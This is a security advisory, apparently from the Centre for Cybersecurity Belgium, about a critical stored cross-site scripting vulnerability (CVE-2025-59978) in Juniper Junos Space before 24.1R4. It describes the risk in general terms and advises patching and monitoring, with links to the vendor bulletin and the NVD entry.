Warning: Critical stored XSS vulnerability in Juniper Networks Junos Space, Patch Immediately!

Image
Decorative image
Veröffentlicht : 10/10/2025

 

    * Last update:  10/10/2025
   
    * Affected software: Juniper Networks Junos Space < 24.1R4
 
    * Type: Cross-site scripting leading to command execution
 
    * CVE/CVSS
        → CVE-2025-59978: CVSS 9.4 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/R:U/RE:M)

 

Sources

 
Juniper: https://supportportal.juniper.net/s/article/2025-10-Security-Bulletin-Junos-Space-Multiple-XSS-vulnerabilities-resolved-in-24-1R4-release
 

Risks

A malicious actor can exploit this vulnerability to store malicious script tags inside a web page wherein if viewed by a privileged user, malicious commands will be executed on the victims' side.
This vulnerability can lead to accounts on the platform being compromised and unauthorized users performing privileged actions. Malicious actors target platforms such as the Junos Space Network Management platform to interact with other interconnected network devices or services. If exploited the impact is high on the confidentiality, integrity and availability of the device.
 

Description

CVE-2025-59978 is a stored XSS vulnerability in Juniper Networks Junos Space. This vulnerability allows a malicious actor to store scripts tags directly in a web page. Wherein if that page is viewed by a user, malicious commands are executed on their behalf via the platform. This allows attackers to possibly execute commands as a privileged user. Allowing them to further compromise accounts on the platform and escalate their privileges.

Recommended Actions

 
Patch 

The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority, after thorough testing.
 
Monitor/Detect 

The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion.
 
In case of an intrusion, you can report an incident via: https://ccb.belgium.be/report-incident.

While patching appliances or software to the newest version may provide safety from future exploitation, it does not remediate historic compromise.
 
 

References

NIST.GOV: https://nvd.nist.gov/vuln/detail/CVE-2025-59978